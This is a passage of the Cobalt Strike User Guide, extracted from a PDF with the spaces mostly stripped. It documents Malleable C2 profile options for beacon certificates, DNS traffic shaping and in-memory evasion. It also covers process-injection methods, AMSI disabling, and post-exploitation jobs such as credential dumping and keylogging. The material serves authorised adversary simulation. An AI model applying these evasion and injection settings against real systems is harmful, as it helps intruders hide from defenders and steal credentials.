MalleableCommandandControl/Self-signedSSLCertificateswithSSLBeacon set trust_x_forwarded_for-ThisoptiondecidesifCobaltStrikeusestheX-Forwarded-For HTTPheadertodeterminetheremoteaddressofarequest.UsethisoptionifyourCobalt StrikeserverisbehindanHTTPredirector. block_useragentsandallow_useragents-Theseoptionsconfigurealistofuseragentsthat areblockedorallowedwitha404response.Bydefault,requestsfromuseragentsthat startwithcurl,lynx,orwgetareallblocked.Ifbotharespecified,block_useragentswill takeprecedenceoverallow_useragents.Theoptionvaluesupportsastringofcomma separatedvalues.Valuessupportsimplegenerics: Example Description notspecified Usethedefaultvalue(curl*,lynx*,wget*).Blockrequests fromuseragentsstartingwithcurl,lynx,orwget. blank(block_useragents) Nouseragentsareblocked. blank(allowuser_agents) Alluseragentsareallowed. something Block/Allowrequestswithuseragentequal'something'. something* Block/Allowrequestswithuseragentstartingwith 'something'. *something Block/Allowrequestswithuseragentendingwith 'something'. something Block/Allowrequestswithuseragentcontaining 'something'. Self-signed SSL Certificates with SSL Beacon TheHTTPSBeaconusestheHTTPBeacon’sindicatorsinitscommunication.MalleableC2 profilesmayalsospecifyparametersfortheBeaconC2server’sself-signedSSLcertificate.This isusefulifyouwanttoreplicateanactorwithuniqueindicatorsintheirSSLcertificate: https-certificate { set CN "bobsmalware.com"; set O "Bob’s Malware"; } Thecertificateparametersunderyourprofile’scontrolare: CobaltStrikeUserGuide www.fortra.com page:144
MalleableCommandandControl/ValidSSLCertificateswithSSLBeacon Option Example Description C US Country CN beacon.cobaltstrike.com CommonName;Yourcallbackdomain L Washington Locality O Fortra,LLC OrganizationName OU CertificateDepartment OrganizationalUnitName ST DC StateorProvince validity 365 Numberofdayscertificateisvalidfor Valid SSL Certificates with SSL Beacon YouhavetheoptiontouseaValidSSLcertificatewithBeacon.UseaMalleableC2profileto specifyaJavaKeystorefileandapasswordforthekeystore.Thiskeystoremustcontainyour certificate’sprivatekey,therootcertificate,anyintermediatecertificates,andthedomain certificateprovidedbyyourSSLcertificatevendor.CobaltStrikeexpectstofindtheJava KeystorefileinthesamefolderasyourMalleableC2profile. https-certificate { set keystore "domain.store"; set password "mypassword"; } TheparameterstouseavalidSSLcertificateare: Option Example Description keystore domain.store JavaKeystorefilewithcertificateinformation password mypassword ThepasswordtoyourJavaKeystore HerearethestepstocreateaValidSSLcertificateforusewithCobaltStrike’sBeacon:
- Usethekeytoolprogram tocreateaJavaKeystorefile.Thisprogram willask“Whatis yourfirstandlastname?”Makesureyouanswerwiththefullyqualifieddomainnameto yourBeaconserver.Also,makesureyoutakenoteofthekeystorepassword.Youwill needitlater. $ keytool -genkey -keyalg RSA -keysize 2048 -keystore domain.store CobaltStrikeUserGuide www.fortra.com page:145
MalleableCommandandControl/ProfileVariants 2. UsekeytooltogenerateaCertificateSigningRequest(CSR).Youwillsubmitthisfileto yourSSLcertificatevendor.Theywillverifythatyouarewhoyouareandissuea certificate.Somevendorsareeasierandcheapertodealwiththanothers. $ keytool -certreq -keyalg RSA -file domain.csr -keystore domain.store 3. ImporttheRootandanyIntermediateCertificatesthatyourSSLvendorprovides. $ keytool -import -trustcacerts -alias FILE -file FILE.crt - keystore domain.store 4. Finally,youmustinstallyourDomainCertificate. $ keytool -import -trustcacerts -alias mykey -file domain.crt - keystore domain.store And,that’sit.YounowhaveaJavaKeystorefilethat’sreadytousewithCobaltStrike’sBeacon. Profile Variants MalleableC2profilefiles,bydefault,containoneprofile.It’spossibletopackvariationsofthe currentprofilebyspecifyingvariantblocksforhttp-beacon,https-certificate,http-get,http-post andhttp-stager. Avariantblockisspecifiedas[block name] “variant name” { … }.Here’savarianthttp-getblock named“MyVariant”: http-get "My Variant" { client { parameter "bar" "blah"; Avariantblockcreatesacopyofthecurrentprofilewiththespecifiedvariantblocksreplacing thedefaultblocksintheprofileitself.Eachuniquevariantnamecreatesanewvariantprofile. Youmaypopulateaprofilewithasmanyvariantnamesasyoulike. VariantsareselectablewhenconfiguringanHTTPorHTTPSBeaconlistener.Variantsallow eachHTTPorHTTPSBeaconlistenertiedtoasingleteamservertohavenetworkIOCsthat differfromeachother. HTTP Beacons Allowsyoutospecifyattributesforgeneralattributesforthehttp(s)beacons. CobaltStrikeUserGuide www.fortra.com page:146
MalleableCommandandControl/CodeSigningCertificate ThedefaultbeaconlibrarycansubsequentlybeoverriddenonUIDialogsandAggressor Commandsthatgeneratebeaconsasneeded. http-beacon { set library "winhttp"; } http-beacon "variant-x" { set library "wininet"; } Thesettingsare: Option Default Value Description library wininet Thelibraryattributeallowsusertospecifythedefault libraryusedbythegeneratedbeaconsusedbythe profile. Thelibrarydefaultsto"wininet",whichistheonly typeofbeaconpriortoversion4.9.Thelibraryvalue canbe"wininet"or"winhttp". Code Signing Certificate Payloads -> Windows Stager PayloadandWindows Stageless Payloadgiveyoutheoptionto signanexecutableorDLLfile.Tousethisoption,youmustspecifyaJavaKeystorefilewith yourcodesigningcertificateandprivatekey.CobaltStrikeexpectstofindtheJavaKeystorefile inthesamefolderasyourMalleableC2profile. code-signer { set keystore "keystore.jks"; set password "password"; set alias "server"; } Thecodesigningcertificatesettingsare: Option Example Description alias server Thekeystore’saliasforthiscertificate CobaltStrikeUserGuide www.fortra.com page:147
MalleableCommandandControl/DNSBeacons Option Example Description digest_ SHA256 Thedigestalgorithm algorithm keystore keystore.jks JavaKeystorefilewithcertificate information password mypassword ThepasswordtoyourJavaKeystore timestamp false Timestampthefileusingathird-party service timestamp_url http://timestamp.digicert.com URLofthetimestampservice DNS Beacons YouhavetheoptiontoshapetheDNSBeacon/ListenernetworktrafficwithMalleableC2. dns-beacon “optional-variant-name” {
Options moved into 'dns-beacon' group in 4.3:
set dns_idle "1.2.3.4"; set dns_max_txt "199"; set dns_sleep "1"; set dns_ttl "5"; set maxdns "200"; set dns_stager_prepend "doc-stg-prepend"; set dns_stager_subhost "doc-stg-sh.";
DNS subhost override options added in 4.3:
set beacon "doc.bc."; set get_A "doc.1a."; set get_AAAA "doc.4a."; set get_TXT "doc.tx."; set put_metadata "doc.md."; set put_output "doc.po."; set ns_response "zero"; } Thesettingsare: Option Default Value Changes dns_idle 0.0.0.0 IPaddressusedtoindicatenotasksare availabletoDNSBeacon;Maskforother DNSC2values CobaltStrikeUserGuide www.fortra.com page:148
MalleableCommandandControl/DNSBeacons Option Default Value Changes dns_max_txt 252 MaximumlengthofDNSTXTresponses fortasks dns_sleep 0 ForceasleeppriortoeachindividualDNS request.(inmilliseconds) dns_stager_prepend Prependtexttopayloadstagedeliveredto DNSTXTrecordstager dns_stager_subhost .stage.123456. SubdomainusedbyDNSTXTrecord stager. dns_ttl 1 TTLforDNSreplies maxdns 255 Maximumlengthofhostnamewhen uploadingdataoverDNS(0-255) beacon DNSsubhostprefixusedforbeaconing requests.(lowercasetext) get_A cdn. DNSsubhostprefixusedforArecord requests(lowercasetext) get_AAAA www6. DNSsubhostprefixusedforAAAArecord requests(lowercasetext) get_TXT api. DNSsubhostprefixusedforTXTrecord requests(lowercasetext) put_metadata www. DNSsubhostprefixusedformetadata requests(lowercasetext) put_output post. DNSsubhostprefixusedforoutput requests(lowercasetext) ns_response drop HowtoprocessNSRecordrequests. "drop"doesnotrespondtotherequest (default),"idle"respondswithArecordfor IPaddressfrom"dns_idle","zero"responds withArecordfor0.0.0.0 Youcanuse"ns_response"whenaDNSserverisrespondingtoatargetwith"Serverfailure" errors.ApublicDNSResolvermaybeinitiatingNSrecordrequeststhattheDNSServerinCobalt StrikeTeamServerisdroppingbydefault. {target} {DNS Resolver} Standard query 0x5e06 A doc.bc.11111111.a.example.com {DNS Resolver} {target} Standard query response 0x5e06 Server failure A doc.bc.11111111.a.example.com CobaltStrikeUserGuide www.fortra.com page:149
MalleableCommandandControl/ExercisingCautionwithMalleableC2 Exercising Caution with Malleable C2 MalleableC2givesyouanewlevelofcontroloveryournetworkandhostindicators.Withthis poweralsocomesresponsibility.MalleableC2isanopportunitytomakealotofmistakestoo. Hereareafewthingstothinkaboutwhenyoucustomizeyourprofiles: l EachCobaltStrikeinstanceusesoneprofileatatime.Ifyouchangeaprofileorloada newprofile,previouslydeployedBeaconscannotcommunicatewithyou. l Alwaysstayawareofthestateofyourdataandwhataprotocolwillallowwhenyou developadatatransform.Forexample,ifyoubase64encodemetadataandstoreitina URIparameter—it’snotgoingtowork.Why?Somebase64characters(+,=,and/)have specialmeaninginaURL.Thec2linttoolandProfileCompilerwillnotdetectthesetypes ofproblems. l Alwaystestyourprofiles,evenaftersmallchanges.IfBeaconcan’tcommunicatewith you,it’sprobablyanissuewithyourprofile.Edititandtryagain. l Trustthec2linttool.Thistoolgoesaboveandbeyondtheprofilecompiler.Thechecks aregroundedinhowthistechnologyisimplemented.Ifac2lintcheckfails,itmeans thereisarealproblem withyourprofile. CobaltStrikeUserGuide www.fortra.com page:150
MalleablePE,ProcessInjection,andPostExploitation/Overview Malleable PE, Process Injection, and Post Exploitation Overview MalleableC2profilesaremorethancommunicationindicators.MalleableC2profilesalso controlBeacon’sin-memorycharacteristics,determinehowBeacondoesprocessinjection,and influenceCobaltStrike’spost-exploitationjobstoo.Thesectionsthatfollowdocumentthese extensionstotheMalleableC2language. PE and Memory Indicators ThestageblockinMalleableC2profilescontrolshowBeaconisloadedintomemoryandedit thecontentoftheBeaconDLL. stage { set userwx "false"; set compile_time "14 Jul 2009 8:14:00"; set image_size_x86 "512000"; set image_size_x64 "512000"; set obfuscate "true"; transform-x86 { prepend "\x90\x90"; strrep "ReflectiveLoader" "DoLegitStuff"; } transform-x64 {
transform the x64 rDLL stage
} stringw "I am not Beacon"; } Thestage blockacceptscommandsthataddstringstothe.rdatasectionoftheBeaconDLL. Thestring commandaddsazero-terminatedstring.Thestringw commandaddsawide(UTF- 16LEencoded)string.Thedata commandaddsyourstringas-is. CobaltStrikeUserGuide www.fortra.com page:151
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators Thetransform-x86 andtransform-x64 blockspadandtransformBeacon’sReflectiveDLL stage.Theseblockssupportthreecommands:prepend,append,andstrrep. Theprepend commandinsertsastringbeforeBeacon’sReflectiveDLL.Theappend command addsastringaftertheBeaconReflectiveDLL.Makesurethatprependeddataisvalidcodefor thestage’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis.The strrep commandreplacesastringwithinBeacon’sReflectiveDLL. ThestageblockacceptsseveraloptionsthatcontroltheBeaconDLLcontentandprovidehints tochangethebehaviorofBeacon’sReflectiveLoader: Option Example Description allocator HeapAlloc SethowBeacon'sReflectiveLoaderallocates memoryfortheagent.Optionsare:HeapAlloc, MapViewOfFile,andVirtualAlloc. cleanup false AskBeacontoattempttofreememoryassociated withtheReflectiveDLLpackagethatinitializedit. data_store_size 16 SethowmanyentriescanbestoredinBeaconData Store. magic_mz_x86 MZRE Overridethefirstbytes(MZheaderincluded)of Beacon'sReflectiveDLL.Validx86instructionsare required.FollowinstructionsthatchangeCPUstate withinstructionsthatundothechange. magic_mz_x64 MZAR Sameasmagic_mz_x86;affectsx64DLL magic_pe PE OverridethePEcharactermarkerusedbyBeacon's ReflectiveLoaderwithanothervalue. module_x861 xpsservices.dll Askthex86ReflectiveLoadertoloadthespecified libraryandoverwriteitsspaceinsteadofallocating memorywithVirtualAlloc. module_x641 xpsservices.dll Sameasmodule_x86;affectsx64loader obfuscate false ObfuscatetheReflectiveDLL’simporttable, overwriteunusedheadercontent,andask ReflectiveLoadertocopyBeacontonewmemory withoutitsDLLheaders. sleep_mask false ObfuscateBeaconandit'sheap,in-memory,priorto sleeping. smartinject false Useembeddedfunctionpointerhintstobootstrap Beaconagentwithoutwalkingkernel32EAT CobaltStrikeUserGuide www.fortra.com page:152
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators Option Example Description stomppe true AskReflectiveLoadertostompMZ,PE,ande_lfanew valuesafteritloadsBeaconpayload syscall_method None Setthesystemcallmethodtouseoninitialbeacon execution.OptionsareNone,Direct,Indirect.See sectionSystemCallsforadditionalinformation. userwx false AskReflectiveLoadertouseoravoidRWX permissionsforBeaconDLLinmemory 1.-Themodule_x86andmodule_x64settingnowsupportstheabilitytospecifythestarting ordinalvaluetosearchforanexportedfunction.Theoptional0x##partisthestarting ordinalvaluespecifiedasaninteger.IfalibraryissetandBeacondoesnotoverwriteitself intothememoryspacethenitlikelythelibrarydoesnothaveanexportedfunctionwithan ordinalvalueof1through15.Toresolvethisdetermineavalidordinalvalueandspecify thisvalueusingtheoptionalsyntax,forexample:setmodule_x64"libtemp.dll+0x90" Cloning PE Headers ThestageblockhasseveraloptionsthatchangethecharacteristicsofyourBeaconReflective DLLtolooklikesomethingelseinmemory.Thesearemeanttocreateindicatorsthatsupport analysisexercisesandthreatemulationscenarios. Option Example Description checksum 0 TheCheckSumvalueinBeacon’sPEheader compile_time 14July20098:14:00 ThebuildtimeinBeacon’sPEheader entry_point 92145 TheEntryPointvalueinBeacon’sPEheader image_size_x64 512000 SizeOfImagevalueinx64Beacon’sPEheader image_size_x86 512000 SizeOfImagevalueinx86Beacon’sPEheader name beacon.x64.dll TheExportednameoftheBeaconDLL rich_header Meta-informationinsertedbythecompiler CobaltStrike’sLinuxpackageincludesatool,peclone,toextractheadersfromaDLLand presentthemasaready-to-usestageblock: ./peclone [/path/to/sample.dll] In-memory Evasion and Obfuscation CobaltStrikeUserGuide www.fortra.com page:153
MalleablePE,ProcessInjection,andPostExploitation/PEandMemoryIndicators Usethestageblock’sprepend commandtodefeatanalysisthatscansthefirstfewbytesofa memorysegmenttolookforsignsofaninjectedDLL.Iftool-specificstringsareusedtodetect youragents,changethemwiththestrrep command. Ifstrrepisn’tenough,setsleep_mask totrue.ThisdirectsBeacontoobfuscateitselfandit's heapin-memorybeforeitgoestosleep.Aftersleeping,Beaconwillde-obfuscateitselfto requestandprocesstasks.TheSMBandTCPBeaconswillobfuscatethemselveswhilewaiting foranewconnectionorwaitingfordatafromtheirparentsession. DecidehowmuchyouwanttolooklikeaDLLinmemory.Ifyouwanttoalloweasydetection, setstomppe tofalse.IfyouwouldliketolightlyobfuscateyourBeaconDLLinmemory,set stomppetotrue.Ifyou’dliketoupthechallenge,setobfuscate totrue.Thisoptionwilltake manystepstoobfuscateyourBeaconstageandthefinalstateoftheDLLinmemory. OnewaytofindmemoryinjectedDLLsistolookfortheMZandPEmagicbytesattheir expectedlocationsrelativetoeachother.Thesevaluesarenotusuallyobfuscatedasthe reflectiveloadingprocessdependsonthem.Theobfuscateoptiondoesnotaffectthesevalues. Setmagic_pe totwolettersorbytesthatmarkthebeginningofthePEheader.Setmagic_mz_ x86 tochangethesemagicbytesinthex86BeaconDLL.Setmagic_mz_x64 forthex64 BeaconDLL.FollowinstructionsthatchangeCPUstatewithinstructionsthatundothechange. Forexample,MZistheeasilyrecognizableheadersequence,butit'salsovalidx86andx64 instructions.Thefollow-onRE(x86)andAR (x64)arevalidx86andx64instructionsthatundo theMZchanges.ThesehintswillchangethemagicvaluesinBeacon'sReflectiveDLLpackage andmakethereflectiveloadingprocessusethenewvalues. figure67-Disassemblyofdefaultmodule_mz_x86value Setuserwx tofalsetoaskBeacon’sloadertoavoidRWXpermissions.Memorysegmentswith thesepermissionswillattractextraattentionfromanalystsandsecurityproducts. Bydefault,Beacon’sloaderallocatesmemorywithVirtualAlloc.Usetheallocator optionto changethis.TheHeapAllocoptionallocatesheapmemoryforBeaconwithRWXpermissions. TheMapViewOfFileallocatorallocatesmemoryforBeaconbycreatingananonymousmemory mappedfileregioninthecurrentprocess.Modulestompingisanalternativetotheseoptions andawaytohaveBeaconexecutefromcovetedimagememory.Setmodule_x86 toaDLLthat CobaltStrikeUserGuide www.fortra.com page:154
MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection isabouttwiceaslargeastheBeaconpayloaditself.Beacon’sx86loaderwillloadthespecified DLL,finditslocationinmemory,andoverwriteit.ThisisawaytosituateBeaconinmemorythat Windowsassociateswithafileondisk.It’simportantthattheDLLyouchooseisnotneededby theapplicationsyouintendtoresidein.Themodule_x64 optionisthesamestory,butitaffects thex64Beacon. Ifyou’reworriedabouttheBeaconstagethatinitializestheBeaconDLLinmemory,setcleanup totrue.ThisoptionwillfreethememoryassociatedwiththeBeaconstagewhenit’snolonger needed. Process Injection Theprocess-injectblockinMalleableC2profilesshapesinjectedcontentandcontrolsprocess injectionbehaviorfortheBeaconpayload.ItalsocontrolsthebehaviorofBeaconObjectFiles (BOF)executionwithinthecurrentbeacon. process-inject {
set how memory is allocated in a remote process for
injected content set allocator "VirtualAllocEx";
set how memory is allocated in the current process for BOF
content set bof_allocator "VirtualAlloc"; set bof_reuse_memory "true";
shape the memory characteristics for injected and BOF
content set min_alloc "16384"; set startrwx "true"; set userwx "false";
transform x86 injected content
transform-x86 { prepend "\x90\x90"; }
transform x64 injected content
transform-x64 { append "\x90\x90"; }
determine how to execute the injected code
execute { CreateThread "ntdll.dll!RtlUserThreadStart"; SetThreadContext; CobaltStrikeUserGuide www.fortra.com page:155
MalleablePE,ProcessInjection,andPostExploitation/ProcessInjection RtlCreateUserThread; } } Theprocess-injectblockacceptsseveraloptionsthatcontroltheprocessinjectionprocessin Beacon: Option Example Description allocator VirtualAllocEx Thepreferredmethodtoallocatememoryinthe remoteprocess.SpecifyVirtualAllocExor NtMapViewOfSection.TheNtMapViewOfSection optionisforsame-architectureinjectiononly. VirtualAllocExisalwaysusedforcross-archmemory allocations. bof_allocator VirtualAlloc Thepreferredmethodtoallocatememoryinthe currentprocesstoexecuteaBOF.Specify VirtualAlloc,MapViewOfFile,orHeapAlloc. bof_reuse_memory true ReusetheallocatedmemoryforsubsequentBOF executionsotherwisereleasethememory.Memory willbeclearedwhennotinuse.Iftheavailable amountofmemoryisnotlargeenoughitwillbe releasedandallocatedwiththelargersize. min_alloc 4096 Minimumamountofmemorytorequestforinjected orBOFcontent. startrwx false UseRWXasinitialpermissionsforinjectedorBOF content.AlternativeisRW.WhenBOFmemoryisnot inusethepermissionswillbesetbasedonthis setting. userwx false UseRWXasfinalpermissionsforinjectedorBOF content.AlternativeisRX. Thetransform-x86 andtransform-x64 blockspadcontentinjectedbyBeacon.Theseblocks supporttwocommands:prependandappend. Theprepend commandinsertsastringbeforetheinjectedcontent.Theappend command addsastringaftertheinjectedcontent.Makesurethatprependeddataisvalidcodeforthe injectedcontent’sarchitecture(x86,x64).Thec2lintprogramdoesnothaveacheckforthis. Theexecute blockcontrolsthemethodsBeaconwillusewhenitneedstoinjectcodeintoa process.Beaconexamineseachoptionintheexecuteblock,determinesiftheoptionisusable forthecurrentcontext,triesthemethodwhenitisusable,andmovesontothenextoptionif codeexecutiondidnothappen.Theexecuteoptionsinclude: CobaltStrikeUserGuide www.fortra.com page:156
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection Option x86->x64 x64->x86 Notes CreateThread Currentprocessonly CreateRemoteThread Yes Nocross-session NtQueueApcThread NtQueueApcThread-s Thisisthe“EarlyBird” injectiontechnique. Suspendedprocesses(e.g., post-exjobs)only. RtlCreateUserThread Yes Yes RiskyonXP-eratargets;uses RWXshellcodeforx86->x64 injection. SetThreadContext Yes Suspendedprocesses(e.g., post-exjobs)only. TheCreateThread andCreateRemoteThread optionshavevariantsthatspawnasuspended threadwiththeaddressofanotherfunction,updatethesuspendedthreadtoexecutethe injectedcode,andresumethatthread.Use[function]“module!function+0x##”tospecifythe startaddresstospoof.Forremoteprocesses,ntdllandkernel32aretheonlyrecommended modulestopullfrom.Theoptional0x##partisanoffsetaddedtothestartaddress.These variantsworkx86->x86andx64->x64only. Theexecuteoptionsyouchoosemustcoveravarietyofcornercases.Thesecornercases includeselfinjection,injectionintosuspendedtemporaryprocesses,cross-sessionremote processinjection,x86->x64injection,x64->x86injection,andinjectionwithorwithoutpassing anargument.Thec2linttoolwillwarnyouaboutcontextsthatyourexecuteblockdoesnot cover. Controlling Process Injection CobaltStrike4.5addedsupporttoallowuserstodefinetheirownprocessinjectiontechnique insteadofusingthebuilt-intechniques.ThisisdonethroughthePROCESS_INJECT_ SPAWN andPROCESS_INJECT_EXPLICIT hookfunctions.CobaltStrikewillcalloneof thesehookfunctionswhenexecutingpostexploitationcommands.Seethesectiononthehook foratableofsupportedcommands. Thetwohookswillcovermostofthepostexploitationcommands.However,therearesome exceptionswhichwillnotusethesehooksandwillcontinuetousethebuilt-intechnique. Beacon Command Aggressor Script function &bdllspawn CobaltStrikeUserGuide www.fortra.com page:157
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection Beacon Command Aggressor Script function shell &bshell execute-assembly &bexecute_assembly Toimplementyourowninjectiontechnique,youwillberequiredtosupplyaBeaconObjectFile (BOF)containingyourexecutablecodeforx86and/orx64architecturesandanAggressor Scriptfilecontainingthehookfunction.SeetheProcessInjectionHookExamplesinthe CommunityKit. Sinceyouareimplementingyourowninjectiontechnique,theprocess-injectsettingsinyour MalleableC2profilewillnotbeusedunlessyourBOFcallstheBeaconAPIfunction BeaconInjectProcessorBeaconInjectTemporaryProcess.Thesefunctionsimplementthe defaultinjectionandmostlikelywillnotbeusedunlessitistoimplementafallbacktothe defaulttechnique. Process Injection Spawn ThePROCESS_INJECT_SPAWNhookisusedtodefinethefork&runprocessinjection technique.Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslisted inthetablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethe built-intechnique. Notethefollowing: l Theelevate,runasadmin,&belevate,&brunasadmin and[beacon] -> Access -> Elevate commandswillonlyusethePROCESS_INJECT_SPAWNhookwhenthe specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for example&bpowerpick. l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook. l The‘(useahash)’notemeansselectacredentialthatreferencesahash. JobTypes Command Aggressor Script UI chromedump dcsync &bdcsync elevate &belevate [beacon]->Access->Elevate [beacon]->Access->GoldenTicket CobaltStrikeUserGuide www.fortra.com page:158
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection Command Aggressor Script UI hashdump &bhashdump [beacon]->Access->DumpHashes keylogger &bkeylogger logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz [beacon]->Access->MakeToken(usea hash) mimikatz &bmimikatz &bmimikatz_small net &bnet [beacon]->Explore->NetView portscan &bportscan [beacon]->Explore->PortScan powerpick &bpowerpick printscreen &bprintscreen pth &bpassthehash runasadmin &brunasadmin [target]->Scan screenshot &bscreenshot [beacon]->Explore->Screenshot screenwatch &bscreenwatch ssh &bssh [target]->Jump->ssh ssh-key &bssh_key [target]->Jump->ssh-key [target]->Jump->exploit Process Injection Explicit ThePROCESS_INJECT_EXPLICIThookisusedtodefinetheexplicitprocessinjectiontechnique. Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslistedinthe tablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethebuilt-in technique. Notethefollowing: l The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List. Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto perform additionalcommandsontheselectedprocess. CobaltStrikeUserGuide www.fortra.com page:159
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation l Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net, portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture arguments. l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook. JobTypes Command Aggressor Script UI browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot chromedump dcsync &bdcsync dllinject &bdllinject hashdump &bhashdump inject &binject [ProcessBrowser]->Inject keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes logonpasswords &blogonpasswords mimikatz &bmimikatz &bmimikatz_small net &bnet portscan &bportscan printscreen &bprintscreen psinject &bpsinject pth &bpassthehash screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes) screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No) shinject &bshinject ssh &bssh ssh-key &bssh_key Controlling Post Exploitation CobaltStrikeUserGuide www.fortra.com page:160
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation LargerCobaltStrikepost-exploitationfeatures(e.g.,screenshot,keylogger,hashdump,etc.)are implementedasWindowsDLLs.Toexecutethesefeatures,CobaltStrikespawnsatemporary process,andinjectsthefeatureintoit.Theprocess-injectblockcontrolstheprocessinjection step.Thepost-exblockcontrolsthecontentandbehaviorsspecifictoCobaltStrike’spost- exploitationfeatures.Withthe4.5releasethesepost-exploitationfeaturesnowsupportexplicit injectionintoanexistingprocesswhenusingthe[pid]and[arch]arguments. post-ex {
control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\rundll32.exe"; set spawnto_x64 "%windir%\sysnative\rundll32.exe";
change the permissions and content of our post-ex DLLs
set obfuscate "true";
change our post-ex output named pipe names...
set pipename "evil_####, stuff\not_##_ev#l";
pass key function pointers from Beacon to its child jobs
set smartinject "true";
disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
cleanup the post-ex UDRL memory when the post-ex DLL is
loaded set cleanup "true"; transform-x64 {
replace a string in the port scanner dll
strrepex "PortScanner" "Scanner module is complete" "Scan is complete";
replace a string in all post exploitation dlls
strrep "is alive." "is up."; } transform-x86 {
replace a string in the port scanner dll
strrepex "PortScanner" "Scanner module is complete" "Scan is complete";
replace a string in all post exploitation dlls
strrep "is alive." "is up."; } } CobaltStrikeUserGuide www.fortra.com page:161
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation Thespawnto_x86 andspawnto_x64 optionscontrolthedefaulttemporaryprocessBeaconwill spawnforitspost-exploitationfeatures.Hereareafewtipsforthesevalues: l Alwaysspecifythefullpathtotheprogram youwantBeacontospawn l Environmentvariables(e.g.,%windir%)areOKwithinthesepaths. l Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32 whereit’snecessary. l Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue, youmustspecifyanx64program. l Thepathsyouspecify(minustheautomaticsyswow64/sysnativeadjustment)must existfrom bothanx64(native)andx86(wow64)viewofthefilesystem. Theobfuscate optionscramblesthecontentofthepost-exDLLsandsettlesthepost-ex capabilityintomemoryinamoreOPSEC-safeway.It’sverysimilartotheobfuscateanduserwx optionsavailableforBeaconviathestageblock.Somelong-runningpost-exDLLswillmaskand unmasktheirstringtable,asneeded,whenthisoptionisset. Usepipename tochangethenamedpipenamesused,bypost-exDLLs,tosendoutputbackto Beacon.Thisoptionacceptsacomma-separatedlistofpipenames.CobaltStrikewillselecta randompipenamefromthisoptionwhenitsetsupapost-exploitationjob.Each#inthe pipenameisreplacedwithavalidhexcharacteraswell. Thesmartinject optiondirectsBeacontoembedkeyfunctionpointers,likeGetProcAddress andLoadLibrary,intoitssame-architecturepost-exDLLs.Thisallowspost-exDLLstobootstrap themselvesinanewprocesswithoutshellcode-likebehaviorthatisdetectedandmitigatedby watchingmemoryaccessestothePEBandkernel32.dll. Thethread_hint optionallowsmulti-threadedpost-exDLLstospawnthreadswithaspoofed startaddress.Specifythethreadhintas“module!function+0x##”tospecifythestartaddressto spoof.Theoptional0x##partisanoffsetaddedtothestartaddress. Theamsi_disable optiondirectspowerpick,execute-assembly,andpsinjecttopatchthe AmsiScanBufferfunctionbeforeloading.NETorPowerShellcode.ThislimitstheAntimalware ScanInterfacevisibilityintothesecapabilities. Thecleanup optioncleansupthepost-exUDRLmemorywhenthepost-exDLLisloaded.See Post-ex User Defined Reflective DLL Loader on page 163formoreinformationonhowthis operateswithacustomizedpost-exUDRL. Setthekeylogger optiontoconfigureCobaltStrike'skeystrokelogger.TheGetAsyncKeyState option(default)usestheGetAsyncKeyStateAPItoobservekeystrokes.The SetWindowsHookExoptionusesSetWindowsHookExtoobservekeystrokes. CobaltStrikeUserGuide www.fortra.com page:162
MalleablePE,ProcessInjection,andPostExploitation/Post-exUserDefinedReflectiveDLLLoader Thetransform-x86andtransform-x64blockstransformBeacon’sPostExploitationDLLs. Theseblockssupporttwocommands:strrepandstrrepex. Thestrrep commandreplacesastringwithinallPostExploitationDLLs.Thestrrepex commandreplacesastringwithinthespecificPostExploitationDLLs,andithasthefollowing syntax:strrepex.Validpost-exnamesare: BrowserPivot,ExecuteAssembly,Hashdump,Keylogger,Mimikatz,NetView,PortScanner, PowerPick,Screenshot,andSSHAgent. Post-ex User Defined Reflective DLL Loader CobaltStrike4.9addedsupportforusingcustomerreflectiveloadersforthepost-expayloads. ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit. GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicencekeyisrequired. APost-exUserDefinedReflectiveLoadercanonlybeappliedtothefollowingpost-exDLLs: l browserpivot l hashdump l invokeassembly l keylogger l mimikatz l netview l portscan l powershell l screenshot l sshagent Implementation ThefollowingAggressorscripthookisprovidedtoallowimplementationofPost-exUser DefinedReflectiveLoaders: Function Description POSTEX_RDLL_GENERATE HookusedtoimplementReflectiveLoaderreplacement forpost-exDLLs.ArgumentsprovidedincludeBeaconID, GetModuleHandleAaddress,andGetProcAddress address. CobaltStrikeUserGuide www.fortra.com page:163
